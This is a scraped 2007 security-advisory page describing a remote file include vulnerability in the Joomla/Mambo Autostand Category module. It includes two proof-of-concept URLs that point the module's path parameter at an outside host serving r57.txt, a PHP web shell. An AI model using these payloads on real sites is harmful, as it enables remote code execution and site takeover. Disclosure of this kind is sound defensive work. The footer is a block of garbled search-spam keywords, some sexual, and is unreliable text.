about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Joomla/Mambo Autostand Category Module MosConfig_Absolute_Path Remote File Include Vulnerability


Title Joomla/Mambo Autostand Category Module MosConfig_Absolute_Path Remote File Include Vulnerability
Published 2007-04-14-12:00AM
Updated 2007-04-16-06:21PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Cold z3ro is credited with the discovery of this vulnerability.
Vulnerable  Autostand Category Autostand Category 1.1
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.example2.com/r57.txt?
http://www.example.com/modules/mod_as_category.php?mosConfig_absolute_path=http://www.example2.com/r57.txt?
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 00:44:09 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
mremap_pte a1.selunta IPB+2.4.1 schoolsey Petarditas N73 Smart vml blue c babygotboo videos ima 200 /compo ww.sax pic Virtuozzo www.bv.old wwwjapanse Nada sapa sexywalpap vsftpd 1.1 black tige zx-j.cn wwwjapanse t816t blue film nudemalece IIS 5 Dav 89.sex.co 200 /compo you-might- news for C Naked vide .Hqtube.Co video3gp big+girls phphtml.ph php-nuke 2 syllable php-nuke 2 candelbox wulinblog. mambo Remo Names chicascali www.bbc pe Xxxmove freepornvi sex scandd Www seks v Nametha se t635t news for C www.heryou